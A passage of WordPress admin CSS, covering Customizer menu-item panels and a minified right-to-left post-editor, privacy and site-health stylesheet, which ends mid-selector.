.available-menu-items-list { overflow-y: auto; max-height: 200px; /* This gets set in JS to fit the screen size, and based on # of sections. */ background: transparent; } #available-menu-items .accordion-section-title button .toggle-indicator { display: flex; align-items: center; width: 28px; height: 35px; position: absolute; top: 5px; right: 5px; box-shadow: none; outline: none; cursor: pointer; text-align: center; } #available-menu-items .accordion-section-title .no-items, #available-menu-items .cannot-expand .accordion-section-title .spinner, #available-menu-items .cannot-expand .accordion-section-title > button:not(#available-menu-items-search button.is-visible) { display: none; } #available-menu-items-search.cannot-expand .accordion-section-title .spinner { display: block; } #available-menu-items .cannot-expand .accordion-section-title .no-items { float: right; color: #50575e; font-weight: 400; margin-left: 5px; } #available-menu-items .accordion-section-content { max-height: 290px; margin: 0; padding: 0; position: relative; background: transparent; } #available-menu-items .accordion-section-content .available-menu-items-list { margin: 0 0 64px; padding: 1px 15px 15px; } #available-menu-items .accordion-section-content .available-menu-items-list:only-child { /* Types that do not support new items for the current user */ margin-bottom: 0; } #new-custom-menu-item .accordion-section-content { padding: 0 15px 15px; } #available-menu-items .menu-item-tpl { margin: 0; } #custom-menu-item-name.invalid, #custom-menu-item-url.invalid, .edit-menu-item-url.invalid, .menu-name-field.invalid, .menu-name-field.invalid:focus, #available-menu-items .new-content-item .create-item-input.invalid, #available-menu-items .new-content-item .create-item-input.invalid:focus { border: 1px solid #d63638; } #available-menu-items .menu-item-handle .item-type { padding-right: 0; } #available-menu-items .menu-item-handle .item-title { padding-left: 20px; } #available-menu-items .menu-item-handle { cursor: pointer; } #available-menu-items .menu-item-handle { box-shadow: none; margin-top: -1px; } #available-menu-items .menu-item-handle:hover { z-index: 1; } #available-menu-items .item-title h4 { padding: 0 0 5px; font-size: 14px; } #available-menu-items .item-add { position: absolute; top: 1px; left: 1px; color: #8c8f94; width: 30px; height: 38px; box-shadow: none; outline: none; cursor: pointer; text-align: center; } #available-menu-items .menu-item-handle .item-add:focus { color: #1d2327; } #available-menu-items .item-add:before { content: "\f543"; content: "\f543" / ''; position: relative; left: 2px; top: 3px; display: inline-block; height: 20px; border-radius: 50%; font: normal 20px/1.05 dashicons; /* line height is to account for the dashicon's vertical alignment */ } #available-menu-items .menu-item-handle.item-added .item-type, #available-menu-items .menu-item-handle.item-added .item-title, #available-menu-items .menu-item-handle.item-added:hover .item-add, #available-menu-items .menu-item-handle.item-added .item-add:focus { color: #646970; } #available-menu-items .menu-item-handle.item-added .item-add:before { content: "\f147"; content: "\f147" / ''; } #available-menu-items .accordion-section-title.loading .spinner, #available-menu-items-search.loading .accordion-section-title .spinner { visibility: visible; margin: 0 20px; } #available-menu-items-search .spinner { position: absolute; bottom: 24px; /* 13 container padding +1 input margin +10 ( ( 40 input height - 20 spinner height ) / 2 ) */ right: 21px; margin: 0 !important; } /* search results list */ #available-menu-items #available-menu-items-search .accordion-section-content { position: absolute; left: 0; top: 83px; /* below title div / search input (75 + 8 for 40px input) */ bottom: 0; /* 100% height that still triggers lazy load */ max-height: none; width: 100%; padding: 1px 15px 15px; box-sizing: border-box; } #available-menu-items-search .nothing-found { /* Compensate the 1px top padding of the container. */ margin-top: -1px; } #available-menu-items-search .accordion-section-title:after { display: none; } #available-menu-items-search .accordion-section-content:empty { min-height: 0; padding: 0; } #available-menu-items-search.loading .accordion-section-content div { opacity: .5; } #available-menu-items-search.loading.loading-more .accordion-section-content div { opacity: 1; } @media (prefers-reduced-motion: no-preference) { #customize-preview { transition: all 0.2s; } } body.adding-menu-items #available-menu-items { left: 0; visibility: visible; } body.adding-menu-items .wp-full-overlay-main { left: 300px; } body.adding-menu-items #customize-preview { opacity: 0.4; } body.adding-menu-items #customize-preview iframe { pointer-events: none; } .menu-item-handle .spinner { display: none; float: left; margin: 0 8px 0 0; } .nav-menu-inserted-item-loading .spinner { display: block; } .nav-menu-inserted-item-loading .menu-item-handle .item-type { padding: 0 0 0 8px; } .nav-menu-inserted-item-loading .menu-item-handle, .added-menu-item .menu-item-handle.loading { padding: 10px 15px 10px 8px; cursor: default; opacity: .5; background: #fff; color: #787c82; } .added-menu-item .menu-item-handle { transition-property: opacity, background, color; transition-duration: 1.25s; transition-timing-function: cubic-bezier( .25, -2.5, .75, 8 ); /* Replacement for .hide().fadeIn('slow') in JS to add emphasis when it's loaded. */ } /* Add/delete Menus */ #customize-theme-controls .control-panel-content .control-section-nav_menu:nth-last-child(2) .accordion-section-title { border-bottom-color: #dcdcde; } /* @todo update selector */ #accordion-section-add_menu { margin: 15px 12px; } #accordion-section-add_menu h3 { text-align: right; } #accordion-section-add_menu h3, #accordion-section-add_menu .customize-add-menu-button { margin: 0; } #accordion-section-add_menu .customize-add-menu-button { font-weight: 400; } #create-new-menu-submit { float: right; margin: 0 0 12px; } .menu-delete-item { float: left; padding: 1em 0; width: 100%; } .assigned-menu-locations-title p { margin: 0 0 8px; } li.assigned-to-menu-location .menu-delete-item { display: none; } li.assigned-to-menu-location .add-new-menu-item { margin-bottom: 1em; } .menu-item-handle { margin-top: -1px; } .ui-sortable-disabled .menu-item-handle { cursor: default; } .menu-item-handle:hover { position: relative; z-index: 10; color: var(--wp-admin-theme-color); } .menu-item-handle:hover .item-type, .menu-item-handle:hover .item-edit, #available-menu-items .menu-item-handle:hover .item-add { color: var(--wp-admin-theme-color); } .menu-item-edit-active .menu-item-handle { border-color: #8c8f94; border-bottom: none; } .customize-control-nav_menu_item { margin-bottom: 0; } .customize-control-nav_menu .new-menu-item-invitation { margin-top: 0; margin-bottom: 0; } .customize-control-nav_menu .customize-control-nav_menu-buttons { display: flex; flex-direction: row-reverse; align-items: center; gap: 8px; margin-top: 12px; } /** * box-shadows */ .wp-customizer .menu-item .submitbox .submitdelete:focus, .customize-screen-options-toggle:focus:before, #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-customizer button:focus .toggle-indicator:before, .menu-delete:focus, .menu-item-bar .item-delete:focus:before, #available-menu-items .item-add:focus:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } @media screen and (max-width: 782px) { #available-menu-items #available-menu-items-search .accordion-section-content { top: 71px; /* 63 + 8 for 40px input */ } } @media screen and (max-width: 640px) { #available-menu-items #available-menu-items-search .accordion-section-content { top: 154px; /* 146 + 8 for 40px input */ } } /*! This file is auto-generated */ #poststuff{padding-top:10px;min-width:763px}#poststuff #post-body{padding:0}#poststuff .postbox-container{width:100%}#poststuff #post-body.columns-2{margin-left:300px}#show-comments{overflow:hidden}#save-action .spinner,#show-comments a{float:right}#show-comments .spinner{float:none;margin-top:0}#lost-connection-notice .spinner{visibility:visible;float:right;margin:0 0 0 5px}#titlediv{position:relative}#titlediv label{cursor:text}#titlediv div.inside{margin:0}#poststuff #titlewrap{border:0;padding:0}#titlediv #title{padding:3px 8px;font-size:1.7em;line-height:100%;height:1.7em;width:100%;outline:0;margin:0 0 3px;background-color:#fff}#titlediv #title-prompt-text{color:#646970;position:absolute;font-size:1.7em;padding:10px;pointer-events:none}#titlewrap .skiplink{background:#fff;line-height:2.30769231;min-height:32px;left:4px}#titlewrap .skiplink:focus{clip:inherit;clip-path:inherit;top:4px;width:auto}input#link_description,input#link_url{width:100%}#pending{background:100% none;border:0 none;padding:0;font-size:11px;margin-top:-1px}#comment-link-box,#edit-slug-box{line-height:1.84615384;min-height:25px;margin-top:5px;padding:0 10px;color:#646970}#sample-permalink{display:inline-block;max-width:100%;word-wrap:break-word}#edit-slug-box .cancel{margin-left:10px;padding:0}#comment-link-box{margin:5px 0;padding:0 5px}#editable-post-name-full{display:none}#editable-post-name{font-weight:600}#editable-post-name input{font-size:13px;font-weight:400;min-height:32px;margin:0;width:16em}.postarea h3 label{float:right}body.post-new-php .submitbox .submitdelete{display:none}.submitbox .submit a:hover{text-decoration:underline}.submitbox .submit input{margin-bottom:8px;margin-left:4px;padding:6px}#post-status-select{margin-top:3px}body.post-type-wp_navigation .inline-edit-status,body.post-type-wp_navigation div#minor-publishing{display:none}.is-dragging-metaboxes .metabox-holder .postbox-container .meta-box-sortables{border-radius:8px;background:rgb(var(--wp-admin-theme-color--rgb),.04);min-height:60px;margin-bottom:20px}.postbox{position:relative;min-width:255px;border:1px solid #c3c4c7;box-shadow:0 1px 1px rgba(0,0,0,.04);background:#fff}#trackback_url{width:99%}#normal-sortables .postbox .submit{background:transparent none;border:0 none;float:left;padding:0 12px;margin:0}.category-add input[type=text],.category-add select{width:100%;max-width:260px;vertical-align:baseline}#side-sortables .category-add input[type=text],#side-sortables .category-add select{margin:0 0 1em}#side-sortables .add-menu-item-tabs li,.wp-tab-bar li,ul.category-tabs li{display:inline;line-height:1.35}.no-js .category-tabs li.hide-if-no-js{display:none}#side-sortables .add-menu-item-tabs a,.category-tabs a,.wp-tab-bar a{text-decoration:none}#post-body ul.add-menu-item-tabs li.tabs a,#post-body ul.category-tabs li.tabs a,#side-sortables .add-menu-item-tabs .tabs a,#side-sortables .category-tabs .tabs a,.wp-tab-bar .wp-tab-active a{color:#2c3338}.category-tabs{margin:8px 0 5px}#category-adder h4{margin:0}.taxonomy-add-new{display:inline-block;margin:10px 0;font-weight:600}#side-sortables .add-menu-item-tabs,.wp-tab-bar{margin-bottom:3px}#normal-sortables .postbox #replyrow .submit{float:none;margin:0;padding:5px 7px 10px;overflow:hidden}#side-sortables .submitbox .submit .preview,#side-sortables .submitbox .submit a.preview:hover,#side-sortables .submitbox .submit input{border:0 none}ul.add-menu-item-tabs,ul.category-tabs,ul.wp-tab-bar{margin-top:12px}ul.add-menu-item-tabs li,ul.category-tabs li{border:solid 1px transparent;position:relative}.wp-tab-active,ul.add-menu-item-tabs li.tabs,ul.category-tabs li.tabs{border:1px solid #dcdcde;border-bottom-color:#fff;background-color:#fff}ul.add-menu-item-tabs li,ul.category-tabs li,ul.wp-tab-bar li{padding:3px 5px 6px}#set-post-thumbnail{display:inline-block;max-width:100%}#postimagediv .inside img{max-width:100%;height:auto;vertical-align:top;background-image:linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:100% 0,10px 10px;background-size:20px 20px}form#tags-filter{position:relative}.ui-tabs-hide,.wp-hidden-children .wp-hidden-child{display:none}#post-body .tagsdiv #newtag{margin-left:0;flex:1;min-width:0}#side-sortables input#post_password{width:94%}#side-sortables .tagsdiv #newtag{flex:1;min-width:0}#post-status-info{width:100%;border-spacing:0;border:1px solid #c3c4c7;border-top:none;background-color:#f6f7f7;box-shadow:0 1px 1px rgba(0,0,0,.04);z-index:999}#post-status-info td{font-size:12px}.autosave-info{padding:2px 10px;text-align:left}#editorcontent #post-status-info{border:none}#content-resize-handle{background:transparent url(../images/resize.gif) no-repeat scroll left bottom;width:12px;cursor:row-resize}.rtl #content-resize-handle{background-image:url(../images/resize-rtl.gif);background-position:left bottom}.wp-editor-expand #content-resize-handle{display:none}#postdivrich #content{resize:none}#wp-word-count{padding:2px 10px}#wp-content-editor-container{position:relative}.wp-editor-expand #wp-content-editor-tools{z-index:1000;border-bottom:1px solid #c3c4c7}.wp-editor-expand #wp-content-editor-container{box-shadow:none;margin-top:-1px}.wp-editor-expand #wp-content-editor-container{border-bottom:0 none}.wp-editor-expand div.mce-statusbar{z-index:1}.wp-editor-expand #post-status-info{border-top:1px solid #c3c4c7}.wp-editor-expand div.mce-toolbar-grp{z-index:999}.mce-fullscreen #wp-content-wrap .mce-edit-area,.mce-fullscreen #wp-content-wrap .mce-menubar,.mce-fullscreen #wp-content-wrap .mce-statusbar,.mce-fullscreen #wp-content-wrap .mce-toolbar-grp{position:static!important;width:auto!important;padding:0!important}.mce-fullscreen #wp-content-wrap .mce-statusbar{visibility:visible!important}.mce-fullscreen #wp-content-wrap .mce-tinymce .mce-wp-dfw{display:none}.mce-fullscreen #wp-content-wrap .mce-wp-dfw,.post-php.mce-fullscreen #wpadminbar{display:none}#wp-content-editor-tools{background-color:#f0f0f1;padding-top:20px}#poststuff #post-body.columns-2 #side-sortables{width:280px}#timestampdiv select{vertical-align:top;font-size:12px;line-height:2.33333333}#aa,#hh,#jj,#mn{padding:6px 1px;font-size:12px;line-height:1.16666666}#hh,#jj,#mn{width:2em}#aa{width:3.4em}.curtime #timestamp{padding:2px 0 1px;display:inline!important;height:auto!important}#post-body #visibility:before,#post-body .misc-pub-comment-status:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-response-to:before,#post-body .misc-pub-revisions:before,#post-body .misc-pub-uploadedby:before,#post-body .misc-pub-uploadedto:before,.curtime #timestamp:before{color:#8c8f94}#post-body #visibility:before,#post-body .misc-pub-comment-status:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-response-to:before,#post-body .misc-pub-revisions:before,#post-body .misc-pub-uploadedby:before,#post-body .misc-pub-uploadedto:before,.curtime #timestamp:before{font:normal 20px/1 dashicons;display:inline-block;margin-right:-1px;padding-left:3px;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#post-body .misc-pub-comment-status:before,#post-body .misc-pub-post-status:before{content:"\f173";content:"\f173"/''}#post-body #visibility:before{content:"\f177";content:"\f177"/''}.curtime #timestamp:before{content:"\f145";content:"\f145"/'';position:relative;top:-1px}#post-body .misc-pub-uploadedby:before{content:"\f110";content:"\f110"/'';position:relative;top:-1px}#post-body .misc-pub-uploadedto:before{content:"\f318";content:"\f318"/'';position:relative;top:-1px}#post-body .misc-pub-revisions:before{content:"\f321";content:"\f321"/''}#post-body .misc-pub-response-to:before{content:"\f101";content:"\f101"/''}#timestampdiv{padding-top:5px;line-height:1.76923076}#timestampdiv p{margin:8px 0 6px}#timestampdiv input{text-align:center}.notification-dialog{position:fixed;top:30%;max-height:70%;right:50%;width:450px;margin-right:-225px;background:#fff;box-shadow:0 3px 6px rgba(0,0,0,.3);line-height:1.5;z-index:1000005;overflow-y:auto}.notification-dialog-background{position:fixed;top:0;right:0;left:0;bottom:0;background:#000;opacity:.7;z-index:1000000}#post-lock-dialog .post-locked-message,#post-lock-dialog .post-taken-over{margin:25px}#file-editor-warning .button,#post-lock-dialog .post-locked-message a.button{margin-left:10px}#post-lock-dialog .post-locked-avatar{float:right;margin:0 0 20px 20px}#post-lock-dialog .wp-tab-first{outline:0}#post-lock-dialog .locked-saving img{float:right;margin-left:3px}#post-lock-dialog.saved .locked-saved,#post-lock-dialog.saving .locked-saving{display:inline}#excerpt{display:block;margin:12px 0 0;height:4em;width:100%}.tagchecklist{margin-right:14px;font-size:12px;overflow:auto}.tagchecklist br{display:none}.tagchecklist strong{margin-right:-8px;position:absolute}.tagchecklist>li{float:right;margin-left:25px;font-size:13px;line-height:1.8;cursor:default;max-width:100%;overflow:hidden;text-overflow:ellipsis}.tagchecklist .ntdelbutton{position:absolute;width:24px;height:24px;border:none;margin:0 -19px 0 0;padding:0;background:0 0;cursor:pointer;text-indent:0}#poststuff .stuffbox>h3,#poststuff h2,#poststuff h3.hndle{font-size:14px;padding:8px 12px;margin:0;line-height:1.4}#poststuff .stuffbox h2{padding:8px 10px}#poststuff .stuffbox>h2{border-bottom:1px solid #f0f0f1}#poststuff .inside{margin:6px 0 0}.link-add-php #poststuff .inside,.link-php #poststuff .inside{margin-top:12px}#poststuff .stuffbox .inside{margin:0}#poststuff .inside #page_template,#poststuff .inside #parent_id{max-width:100%}.post-attributes-label-wrapper{margin-bottom:.5em}.post-attributes-label{vertical-align:baseline;font-weight:600}#comment-status-radio,#post-visibility-select{line-height:1.5;margin-top:3px}#linksubmitdiv .inside,#poststuff #submitdiv .inside{margin:0;padding:0}#post-body-content,.edit-form-section{margin-bottom:20px}.wp_attachment_details .attachment-content-description{margin-top:.5385em;display:inline-block;min-height:1.6923em}.privacy-settings #wpcontent,.privacy-settings.auto-fold #wpcontent,.site-health #wpcontent,.site-health.auto-fold #wpcontent{padding-right:0}.privacy-settings .notice,.site-health .notice{margin:25px 22px 15px 20px}.privacy-settings .notice~.notice,.site-health .notice~.notice{margin-top:5px}.health-check-header h1,.privacy-settings-header h1{display:inline-block;font-weight:600;margin:0 .8rem 1rem;font-size:23px;padding:9px 0 4px;line-height:1.3}.health-check-header,.privacy-settings-header{text-align:center;margin:0 0 1rem;background:#fff;border-bottom:1px solid #dcdcde}.health-check-title-section,.privacy-settings-title-section{display:flex;align-items:center;justify-content:center;clear:both;padding-top:8px}.privacy-settings-tabs-wrapper{display:-ms-inline-grid;-ms-grid-columns:1fr 1fr;vertical-align:top;display:inline-grid;grid-template-columns:1fr 1fr}.privacy-settings-tab{display:block;text-decoration:none;color:inherit;padding:.5rem 1rem 1rem;margin:0 1rem;transition:box-shadow .5s ease-in-out}.health-check-tab:first-child,.privacy-settings-tab:first-child{-ms-grid-column:1}.health-check-tab:nth-child(2),.privacy-settings-tab:nth-child(2){-ms-grid-column:2}.health-check-tab:focus,.privacy-settings-tab:focus{color:#1d2327;outline:1px solid #787c82;box-shadow:none}.health-check-tab.active,.privacy-settings-tab.active{box-shadow:inset 0 -3px var(--wp-admin-theme-color);font-weight:600}.health-check-body,.privacy-settings-body{max-width:800px;margin:0 auto}.tools-privacy-policy-page th{min-width:230px}.hr-separator{margin-top:20px;margin-bottom:15px}.health-check-accordion,.privacy-settings-accordion{border:1px solid #c3c4c7}.health-check-accordion-heading,.privacy-settings-accordion-heading{margin:0;border-top:1px solid #c3c4c7;font-size:inherit;line-height:inherit;font-weight:600;color:inherit}.health-check-accordion-heading:first-child,.privacy-settings-accordion-heading:first-child{border-top:none}.health-check-accordion-trigger,.privacy-settings-accordion-trigger{background:#fff;border:0;color:#2c3338;cursor:pointer;display:flex;font-weight:400;margin:0;padding:1em 1.5em 1em 3.5em;min-height:46px;position:relative;text-align:right;width:100%;align-items:center;justify-content:space-between;-webkit-user-select:auto;user-select:auto}.health-check-accordion-trigger:active,.health-check-accordion-trigger:hover,.privacy-settings-accordion-trigger:active,.privacy-settings-accordion-trigger:hover{background:#f6f7f7}.health-check-accordion-trigger:focus,.privacy-settings-accordion-trigger:focus{color:#1d2327;border:none;box-shadow:none;outline-offset:-1px;outline:2px solid var(--wp-admin-theme-color);background-color:#f6f7f7}.health-check-accordion-trigger .title,.privacy-settings-accordion-trigger .title{pointer-events:none;font-weight:600;flex-grow:1}.health-check-accordion-trigger .icon,.privacy-settings-accordion-trigger .icon,.privacy-settings-view-read .icon,.site-health-view-passed .icon{border:solid #50575e;border-width:0 0 2px 2px;height:.5rem;pointer-events:none;position:absolute;left:1.5em;top:50%;transform:translateY(-70%) rotate(-45deg);width:.5rem}.health-check-accordion-trigger .badge,.privacy-settings-accordion-trigger .badge{padding:.1rem .5rem .15rem;color:#2c3338;font-weight:600}.privacy-settings-accordion-trigger .badge{margin-right:.5rem}.health-check-accordion-trigger .badge.blue,.privacy-settings-accordion-trigger .badge.blue{border:1px solid var(--wp-admin-theme-color)}.health-check-accordion-trigger .badge.orange,.privacy-settings-accordion-trigger .badge.orange{border:1px solid #dba617}.health-check-accordion-trigger .badge.red,.privacy-settings-accordion-trigger .badge.red{border:1px solid #e65054}.health-check-accordion-trigger .badge.green,.privacy-settings-accordion-trigger .badge.green{border:1px solid #00ba37}.health-check-accordion-trigger .badge.purple,.privacy-settings-accordion-trigger .badge.purple{border:1px solid #2271b1}.health-check-accordion-trigger .badge.gray,.privacy-settings-accordion-trigger .badge.gray{border:1px solid #c3c4c7}.health-check-accordion-trigger[aria-expanded=true] .icon,.privacy-settings-accordion-trigger[aria-expanded=true] .icon,.privacy-settings-view-passed[aria-expanded=true] .icon,.site-health-view-passed[aria-expanded=true] .icon{transform:translateY(-30%) rotate(135deg)}.health-check-accordion-panel,.privacy-settings-accordion-panel{margin:0;padding:1em 1.5em;background:#fff}.health-check-accordion-panel[hidden],.privacy-settings-accordion-panel[hidden]{display:none}.health-check-accordion-panel a .dashicons,.privacy-settings-accordion-panel a .dashicons{text-decoration:none}.privacy-settings-accordion-actions{justify-content:right;display:flex;align-items:center;flex-wrap:wrap;gap:1em}.privacy-settings-accordion-actions .success{display:none;color:#007017}.privacy-settings-accordion-actions .success.visible{display:inline-block}.privacy-settings-accordion-panel.hide-privacy-policy-tutorial .privacy-policy-tutorial,.privacy-settings-accordion-panel.hide-privacy-policy-tutorial .privacy-text-copy,.privacy-settings-accordion-panel.hide-privacy-policy-tutorial .wp-policy-help{display:none}.privacy-settings-accordion-panel strong.privacy-policy-tutorial,.privacy-settings-accordion-panel strong.wp-policy-help{display:block;margin:0 0 1em}.privacy-text-copy span{pointer-events:none}.privacy-settings-accordion-panel .wp-suggested-text div>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p),.privacy-settings-accordion-panel .wp-suggested-text>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p),.privacy-settings-accordion-panel div>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p),.privacy-settings-accordion-panel>:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p){margin:0;padding:1em;border-right:2px solid #787c82}@media screen and (max-width:782px){.health-check-body,.privacy-settings-body{margin:0 12px;width:auto}.privacy-settings .notice,.site-health .notice{margin:5px 10px 15px}.privacy-settings .update-nag,.site-health .update-nag{margin-left:10px;margin-right:10px}input#create-page{margin-top:10px}.wp-core-ui button.privacy-text-copy{white-space:normal;line-height:1.8}#edit-slug-box{padding:0}#editable-post-name input{min-height:40px}}@media only screen and (max-width:1004px){.health-check-body,.privacy-settings-body{margin:0 22px;width:auto}}#postcustomstuff thead th{padding:5px 8px 8px;background-color:#f0f0f1}#postcustom #postcustomstuff .submit{border:0 none;float:none;padding:0 8px 8px}#postcustom #postcustomstuff .add-custom-field{padding:12px 8px 8px}#side-sortables #postcustom #postcustomstuff .submit{margin:0;padding:0}#side-sortables #postcustom #postcustomstuff #the-list textarea{height:85px}#side-sortables #postcustom #postcustomstuff td.left input,#side-sortables #postcustom #postcustomstuff td.left select,#side-sortables #postcustomstuff #newmetaleft a{margin:3px 3px 0}#postcustomstuff table{margin:0;width:100%;border:1px solid #dcdcde;border-spacing:0;background-color:#f6f7f7}#postcustomstuff tr{vertical-align:top}#postcustomstuff table input,#postcustomstuff table select,#postcustomstuff table textarea{width:96%;margin:8px}#side-sortables #postcustomstuff table input,#side-sortables #postcustomstuff table select,#side-sortables #postcustomstuff table textarea{margin:3px}#postcustomstuff td.left,#postcustomstuff th.left{width:38%}#postcustomstuff .submit input{margin:0;width:auto}#postcustomstuff #newmeta-button,#postcustomstuff #newmetaleft a{display:inline-block;margin:0 8px 8px;text-decoration:none}.no-js #postcustomstuff #enternew{display:none}#post-body-content .compat-attachment-fields{margin-bottom:20px}.compat-attachment-fields th{padding-top:5px;padding-left:10px}#select-featured-image{padding:4px 0;overflow:hidden}#select-featured-image img{max-width:100%;height:auto;margin-bottom:10px}#select-featured-image a{float:right;clear:both}#select-featured-image .remove{display:none;margin-top:10px}.js #select-featured-image.has-featured-image .remove{display:inline-block}.no-js #select-featured-image .choose{display:none}.post-format-icon::before{display:inline-block;vertical-align:middle;height:20px;width:20px;margin-top:-4px;margin-left:7px;color:#dcdcde;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}a.post-format-icon:hover:before{color:#135e96}#post-formats-select{line-height:2}#post-formats-select .post-format-icon::before{top:5px}input.post-format{margin-top:1px}label.post-format-icon{margin-right:0;padding:2px 0}.post-format-icon.post-format-standard::before{content:"\f109";content:"\f109"/''}.post-format-icon.post-format-image::before{content:"\f128";content:"\f128"/''}.post-format-icon.post-format-gallery::before{content:"\f161";content:"\f161"/''}.post-format-icon.post-format-audio::before{content:"\f127";content:"\f127"/''}.post-format-icon.post-format-video::before{content:"\f126";content:"\f126"/''}.post-format-icon.post-format-chat::before{content:"\f125";content:"\f125"/''}.post-format-icon.post-format-status::before{content:"\f130";content:"\f130"/''}.post-format-icon.post-format-aside::before{content:"\f123";content:"\f123"/''}.post-format-icon.post-format-quote::before{content:"\f122";content:"\f122"/''}.post-format-icon.post-format-link::before{content:"\f103";content:"\f103"/''}.category-adder{margin-right:120px;padding:4px 0}.category-adder h4{margin:0 0 8px}#side-sortables .category-adder{margin:0}.categorydiv div.tabs-panel,.customlinkdiv div.tabs-panel,.posttypediv div.tabs-panel,.taxonomydiv div.tabs-panel,.wp-tab-panel{min-height:42px;max-height:200px;overflow:auto;padding:0 .9em;border:solid 1px #dcdcde;background-color:#fff}div.tabs-panel-active{display:block}div.tabs-panel-inactive{display:none}div.tabs-panel-active:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#front-page-warning,#front-static-pages ul,.categorydiv ul.categorychecklist ul,.customlinkdiv ul.categorychecklist ul,.inline-editor ul.cat-checklist ul,.options-discussion-php .indent-children ul,.posttypediv ul.categorychecklist ul,.taxonomydiv ul.categorychecklist ul,ul.export-filters{margin-right:18px}ul.categorychecklist li{margin:0;padding:0;line-height:1.69230769;word-wrap:break-word}.categorydiv .tabs-panel,.customlinkdiv .tabs-panel,.posttypediv .tabs-panel,.taxonomydiv .tabs-panel{border-width:3px;border-style:solid}.form-wrap label{display:block;padding:2px 0}.form-field input[type=email],.form-field input[type=number],.form-field input[type=password],.form-field input[type=search],.form-field input[type=tel],.form-field input[type=text],.form-field input[type=url],.form-field textarea{border-style:solid;border-width:1px;width:95%}.form-field p,.form-field select{max-width:95%}.form-wrap p,p.description{margin:2px 0 5px;color:#646970}.form-wrap p,p.description,p.help,span.description{font-size:13px}p.description code{font-style:normal}.form-wrap p code,p.description code{color:#50575e}.form-wrap .form-field{margin:1em 0;padding:0}.col-wrap h2{margin:12px 0;font-size:1.1em}.col-wrap p.submit{margin-top:-10px}.edit-term-notes{margin-top:2em}#poststuff .tagsdiv .ajaxtag{margin-top:1em;display:flex;gap:8px;align-items:center}#poststuff .tagsdiv .howto{margin:1em 0 6px}.ajaxtag .newtag{position:relative}.tagsdiv .newtag{flex:1;min-width:0}.tagsdiv .the-tags{display:block;height:60px;margin:0 auto;overflow:auto;width:260px}#post-body-content .tagsdiv .the-tags{margin:0 5px}p.popular-tags{border:none;line-height:2em;padding:8px 12px 12px;text-align:justify}p.popular-tags a{padding:0 3px}.tagcloud{width:97%;margin:0 0 40px;text-align:justify}.tagcloud h2{margin:2px 0 12px}#poststuff .inside .the-tagcloud{margin:5px 0 10px;padding:8px;border:1px solid #dcdcde;line-height:1.2;word-spacing:3px}.the-tagcloud ul{margin:0}.the-tagcloud ul li{display:inline-block}.ac_results{display:none;margin:-1px 0 0;padding:0;list-style:none;position:absolute;z-index:10000;border:1px solid #4f94d4;background-color:#fff}.wp-customizer .ac_results{z-index:500000}.ac_results li{margin:0;padding:5px 10px;white-space:nowrap;text-align:right}.ac_over .ac_match,.ac_results .ac_over{background-color:#2271b1;color:#fff;cursor:pointer}.ac_match{text-decoration:underline}#addtag .spinner{float:none;vertical-align:top}#edittag{max-width:800px}.edit-tag-actions{display:flex;align-items:center;gap:8px;margin-top:20px}.comment-php .wp-editor-area{height:200px}.comment-ays td,.comment-ays th{padding:10px 15px}.comment-ays .comment-content ul{list-style:initial;margin-right:2em}.comment-ays .comment-content a[href]:after{content:"(" attr(href) ")";display:inline-block;padding:0 4px;color:#646970;font-size:13px;word-break:break-all}.comment-ays .comment-content p.edit-comment{margin-top:10px}.comment-ays .comment-content p.edit-comment a[href]:after{content:"";padding:0}.comment-ays-submit .button-cancel{margin-right:1em}.spam-undo-inside,.trash-undo-inside{margin:1px 0 1px 8px;line-height:1.23076923}.spam-undo-inside .avatar,.trash-undo-inside .avatar{height:20px;width:20px;margin-left:8px;vertical-align:middle}.stuffbox .editcomment{clear:none;margin-top:0}#namediv.stuffbox .editcomment input{width:100%}#namediv.stuffbox .editcomment.form-table td{padding:10px}#comment-status-radio p{margin:3px 0 5px}#comment-status-radio input{margin:2px 0 5px 3px;vertical-align:middle}#comment-status-radio label{padding:5px 0}table.links-table{width:100%;border-spacing:0}.links-table th{font-weight:400;text-align:right;vertical-align:top;min-width:80px;width:20%;word-wrap:break-word}.links-table td,.links-table th{padding:5px 0}.links-table td label{margin-left:8px}.links-table td input[type=text],.links-table td textarea{width:100%}.links-table #link_rel{max-width:280px}#qt_content_dfw{display:none}.wp-editor-expand #qt_content_dfw{display:inline-block}.focus-on #screen-meta,.focus-on #screen-meta-links,.focus-on #wp-toolbar,.focus-on #wpfooter,.focus-on .page-title-action,.focus-on .postbox-container>*,.focus-on .update-nag,.focus-on .wrap>h1,.focus-on div.error,.focus-on div.notice,.focus-on div.updated{opacity:0;transition-duration:.6s;transition-property:opacity;transition-timing-function:ease-in-out}.focus-on #wp-toolbar{opacity:.3}.focus-off #screen-meta,.focus-off #screen-meta-links,.focus-off #wp-toolbar,.focus-off #wpfooter,.focus-off .page-title-action,.focus-off .postbox-container>*,.focus-off .update-nag,.focus-off .wrap>h1,.focus-off div.error,.focus-off div.notice,.focus-off div.updated{opacity:1;transition-duration:.2s;transition-property:opacity;transition-timing-function:ease-in-out}.focus-off #wp-toolbar{-webkit-transform:translate(0,0)}.focus-on #adminmenuback,.focus-on 